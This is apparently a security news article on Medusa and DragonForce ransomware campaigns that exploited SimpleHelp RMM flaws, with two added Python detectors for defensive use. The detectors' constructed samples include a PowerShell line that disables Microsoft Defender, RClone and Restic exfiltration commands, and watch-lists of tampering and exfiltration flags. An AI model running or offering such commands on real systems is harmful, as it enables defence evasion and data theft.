Cybersecurity researchers at Zensec have exposed a sophisticated supply-chain attack campaign that weaponised trusted Remote Monitoring and Management (RMM) infrastructure to deploy ransomware across multiple UK organisations throughout early 2025.
The investigation reveals how two prominent ransomware-as-a-service groups exploited critical vulnerabilities in SimpleHelp RMM software to breach downstream customers through their managed service providers.
The attacks centred on three vulnerabilities in the SimpleHelp RMM platform disclosed in January 2025: CVE-2024-57727, a path traversal that lets an unauthenticated attacker read arbitrary files from the server, including its configuration; CVE-2024-57728, an arbitrary file upload that gives an administrator remote code execution on the server; and CVE-2024-57726, a missing authorisation check that lets a low-privilege technician account escalate to administrator. Chained together, they take an attacker from no credentials to code execution on the RMM server.
SimpleHelp, widely deployed by MSPs and software vendors for remote endpoint management, became a gateway for attackers wherever it was left unpatched.
Because the SimpleHelp agent runs with SYSTEM-level privileges on managed endpoints by default, a compromised server handed the threat actors unfettered control over every connected machine, letting them bypass traditional security controls and move laterally with minimal friction.
SimpleHelp had shipped fixes (versions 5.5.8, 5.4.10 and 5.3.9) in January 2025 and rated the flaws as severe, yet numerous organisations were still compromised through unpatched instances throughout Q1 and Q2 2025.
The compromised RMM servers functioned as privileged staging points, enabling attackers to reach downstream customer environments through legitimate management channels that security tools inherently trust.
Medusa Ransomware Campaign
The Medusa ransomware group orchestrated a coordinated campaign targeting multiple UK organisations in Q1 2025.
After gaining initial access through compromised SimpleHelp instances, the attackers deployed PDQ Inventory and PDQ Deploy in approximately half of the observed incidents.
These legitimate IT management tools were repurposed to push ransomware payloads, named “Gaze.exe” or after the victim organisation, to machines across the network.
Medusa’s operators evaded endpoint defences by pushing base64-encoded PowerShell commands through PDQ Deploy that disabled Microsoft Defender and configured exclusions before the payload ran.
Network reconnaissance tools such as netscan.exe (SoftPerfect Network Scanner) let the threat actors enumerate hosts and prioritise high-value targets, including domain controllers, file servers, and backup infrastructure.
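The Defender-tampering step above is worth a concrete detection. What follows is an added example, not code from the Zensec report or from this article: it decodes the base64 blob PowerShell accepts after -EncodedCommand (the script is UTF-16LE before base64 encoding) and flags Set-MpPreference / Add-MpPreference usage that weakens Defender, as pushed through PDQ Deploy. The two process-creation events are constructed, and the PDQ Deploy runner path and the watch-list of cmdlet patterns are assumptions.

```python
"""
Added example (not from the Zensec report or this article): decode PowerShell
-EncodedCommand payloads from process-creation telemetry (Sysmon event 1 or
Security 4688) and flag Defender-tampering cmdlets. Sample events are constructed.
"""
import base64
import re
from typing import Optional

# Cmdlet/parameter pairs that weaken Microsoft Defender. Assumed watch-list,
# not an exhaustive one.
DEFENDER_TAMPER_PATTERNS = [
    r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true",
    r"Set-MpPreference\b.*-DisableBehaviorMonitoring\s+\$?true",
    r"Set-MpPreference\b.*-DisableIOAVProtection\s+\$?true",
    r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)\b",
    r"Uninstall-WindowsFeature\b.*Windows-Defender",
]

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def defender_tamper_hits(script: str) -> list:
    """Which watch-list patterns the (decoded) script matches."""
    return [p for p in DEFENDER_TAMPER_PATTERNS if re.search(p, script, re.IGNORECASE)]


def analyse_event(event: dict) -> dict:
    """event: {'host', 'parent', 'image', 'cmdline'} from process-creation telemetry."""
    decoded = decode_encoded_command(event["cmdline"])
    script = decoded if decoded is not None else event["cmdline"]
    hits = defender_tamper_hits(script)
    # PDQ Deploy executes pushed packages from its runner service; a PowerShell
    # child of it is a useful anchor for the pattern described in the report.
    # The runner path below is an assumption.
    from_pdq = "pdqdeploy" in event["parent"].lower()
    return {"host": event["host"], "decoded": decoded, "hits": hits,
            "pdq_parent": from_pdq, "suspicious": bool(hits)}


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument; used only to construct the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_EVENTS = [  # constructed sample telemetry
    {"host": "FS01",
     "parent": r"C:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\PDQDeployRunner-1.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_ps(
         r"Set-MpPreference -DisableRealtimeMonitoring $true; "
         r"Add-MpPreference -ExclusionPath 'C:\ProgramData'")},
    {"host": "WS22", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -Command Get-ChildItem C:\Temp"},
]


def run(events=SAMPLE_EVENTS) -> list:
    return [analyse_event(e) for e in events]


if __name__ == "__main__":
    for result in run():
        print(result)
```

The decode step matters because a string match on the raw command line sees only base64; matching on the decoded script is what surfaces the cmdlets, and the PDQ parent flag gives the analyst the delivery channel rather than just the action.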
Data exfiltration occurred in approximately 50 percent of the Medusa incidents analysed, using RClone renamed to “lsp.exe” to evade name-based detection.
The tool was run with a 1500-day age filter and a 1500 MB size ceiling (in RClone terms, --max-age 1500d and --max-size 1500M, where --max-age selects files modified within the window), prioritising recent user data while skipping unnecessarily large files such as archives and disk images.
The attackers systematically deleted the RClone configuration files after exfiltration to hinder forensic investigation.
The ransomware encrypted systems with the “.MEDUSA” extension and dropped ransom notes titled “!!!READ_ME_MEDUSA!!!.txt” on infected machines.
Medusa’s double extortion model manifested through their data leak site, where victims appeared with proof-of-life packs including screenshots, document previews, and browsable file trees designed to pressure organisations into payment. The Medusa leak site was still operational at the time of writing, with many victims published.
DragonForce Ransomware Operations
DragonForce, a relatively new ransomware-as-a-service group established in 2023, executed similar campaigns throughout Q2 2025.
DragonForce’s methodology mirrored Medusa’s initial access vector through compromised SimpleHelp instances, though their tactical execution differed in key areas.
After establishing access via RMM compromise, DragonForce operators installed AnyDesk for interactive control and created local administrator accounts named “admin” to maintain persistence.
The group demonstrated particular interest in backup infrastructure, executing credential harvesting scripts like “Get-Veeam-Creds.ps1” to extract plaintext credentials from Veeam SQL password stores and configuration files.
DragonForce’s exfiltration methodology favoured Restic, an open-source backup tool, over RClone. The attackers configured Restic to transfer data to S3-compatible storage endpoints, specifically Wasabi cloud storage, which amounts to an unauthorised off-site backup of the victim’s data under attacker control.
The ransomware payload targeted Hyper-V VHDX files and encrypted systems with the “.dragonforce_encrypted” extension.
File names were obscured with random character strings matching the original filename length. Ransom notes titled “readme.txt” directed victims to contact the operators over Tox using a listed Tox ID. DragonForce maintained both a public-facing blog for initial victim listings and a data leak site where stolen files became browsable and downloadable.
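Both exfiltration methods above, Medusa’s renamed RClone and DragonForce’s Restic-to-Wasabi jobs, share a weakness for defenders to exploit: the command line gives the tool away even when the binary is renamed. The following is an added example, not code from the Zensec report or this article. It fingerprints RClone and Restic from their verbs, flags and remote/repository syntax rather than the image name, and pulls out the S3 endpoint when present. The three command lines are constructed; the remote name “r1”, the bucket names, the paths and the flag watch-lists are assumptions.

```python
"""
Added example (not from the Zensec report or this article): identify RClone and
Restic jobs from process command lines instead of binary names, so a renamed
copy such as lsp.exe still surfaces. Sample command lines are constructed.
"""
import os
import re
from typing import Optional

# Vocabulary characteristic of each tool. Assumed watch-lists; both tools accept
# many more options, these are the ones commonly seen in exfiltration jobs.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "lsd", "lsf"}
RCLONE_FLAGS = {"--max-age", "--min-age", "--max-size", "--transfers", "--config",
                "--ignore-existing", "--no-check-certificate", "--multi-thread-streams"}
RESTIC_VERBS = {"init", "backup", "snapshots", "restore", "forget"}
RESTIC_FLAGS = {"--repo", "--password-file", "--password-command", "--tag", "--exclude"}

# rclone remote reference 'name:path'. Two or more characters before the colon
# excludes drive letters such as C:\, the lookahead excludes URLs (https://...).
REMOTE_RE = re.compile(r"^([A-Za-z0-9_-]{2,}):(?!//)")
# restic S3 repository spec, e.g. s3:s3.wasabisys.com/bucket or s3:https://host/bucket
S3_RE = re.compile(r"\bs3:(?:https?://)?([\w.-]+)", re.IGNORECASE)


def fingerprint(cmdline: str) -> dict:
    """Classify one process command line (whitespace-split; paths with spaces are
    not handled in this example)."""
    tokens = cmdline.split()
    image = os.path.basename(tokens[0].strip('"').replace("\\", "/")).lower()
    words = {t.lower() for t in tokens[1:]}
    flags = {t.split("=", 1)[0].lower() for t in tokens[1:] if t.startswith("--")}
    remotes = [t for t in tokens[1:] if REMOTE_RE.match(t) and not t.lower().startswith("s3:")]
    s3 = S3_RE.search(cmdline)

    tool: Optional[str] = None
    if words & RCLONE_VERBS and (flags & RCLONE_FLAGS or remotes):
        tool = "rclone"
    elif words & RESTIC_VERBS and ("-r" in tokens or flags & RESTIC_FLAGS or s3):
        tool = "restic"

    return {
        "image": image,
        "tool": tool,
        # the binary is not named after the tool it behaves like
        "renamed": tool is not None and not image.startswith(tool),
        "remotes": remotes,
        "s3_endpoint": s3.group(1) if s3 else None,
        "wasabi": bool(s3 and s3.group(1).lower().endswith("wasabisys.com")),
        "suspicious": tool is not None,
    }


SAMPLE_CMDLINES = [  # constructed
    r"C:\ProgramData\lsp.exe copy \\FS01\Finance r1:drop/finance --max-age 1500d --max-size 1500M --transfers 16 --config C:\ProgramData\r.conf",
    r"C:\Windows\Temp\restic.exe -r s3:s3.eu-west-1.wasabisys.com/corp-bk backup D:\Shares --tag weekly",
    r"C:\Windows\System32\Robocopy.exe D:\Shares \\BK01\Backups /MIR /R:1",
]


def scan(cmdlines=SAMPLE_CMDLINES) -> list:
    return [fingerprint(c) for c in cmdlines]


if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

Pair this with the rest of the report’s observations for a higher-confidence alert: a first-seen binary invoked from ProgramData or Temp, a parent of AnyDesk or the RMM agent, and a destination the organisation has no business relationship with.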
Supply Chain Security Imperative
These campaigns illuminate a fundamental weakness in modern IT ecosystems: organisations remain only as secure as their least-protected vendor.
When trusted third-party RMM infrastructure is compromised, attackers inherit legitimate access channels that bypass perimeter defences and evade monitoring tuned to detect anomalous connections rather than anomalous use of expected ones.
The exploitation of SimpleHelp vulnerabilities months after patches were available underscores persistent challenges in supply chain security and patch management across interconnected business relationships. Both Medusa and DragonForce capitalised on this trust model, turning MSP management tools into delivery mechanisms for ransomware and data theft.
Organisations must urgently audit third-party remote access tools, verify vendor patch status (for SimpleHelp, confirm the server runs a release at or above the January 2025 fixes), segment networks so that an RMM server cannot reach backup and domain infrastructure directly, and alert on RMM-originated activity that routine management should never generate, such as Defender configuration changes, new local administrator accounts, or unfamiliar binaries pushed to many hosts at once.
The supply chain attacks documented by Zensec demonstrate that perimeter security alone provides insufficient protection when trusted management platforms become adversary infrastructure.